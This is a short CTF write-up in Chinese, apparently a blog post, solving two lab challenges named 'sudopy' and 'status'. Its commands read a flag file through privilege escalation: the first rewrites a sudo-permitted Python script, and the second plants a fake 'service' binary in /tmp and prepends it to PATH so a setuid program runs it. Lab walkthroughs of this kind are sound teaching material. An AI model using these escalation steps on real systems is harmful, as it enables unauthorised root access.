sudopy
题目描述:
我们使用kali进行ssh连接
ssh -p 端口 用户@ip
先查看一下本地有哪些文件
发现有一个flag文件,还有web.py文件
我们看题目sudopy
可以想到可能跟sudo有关,且利用py提权
sudo -l # 列出用户权限或检查某个特定命令
发现特定命令是使用python3运行web.py文件
web.py的文件权限允许我们读,我们看看里面写了什么内容
简单看一下,会发现没有用,我们换一下思路,看看能不能重新编辑web.py文件
vim web.py
把里面的内容修改为
import os
os.system('cat /home/ctf/flag')
我们执行一下
发现报错,我们跟个路径再执行一次
完美解决!!!
status
看题目
还是一样的,我们先ssh连接
先看看本地有什么文件
发现有个可执行还有s权限的checkgenshin文件,还有flag
我们先执行checkgenshin看看,会回显出什么
* sshd is running
这一个回显,再结合题目status,可以想到是查看ssh服务的状态
我们先执行命令,验证一下是不是
service ssh status
这时候就能想到一种提权方法,环境变量,命令劫持
想都想到这了,我们试试
cd /tmp
echo 'cat /home/ctf/flag' > service
chmod +x service
export PATH=/tmp:$PATH
我们执行一下checkgenshin文件
/home/ctf/checkgenshin
完美解决!!!
2220
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
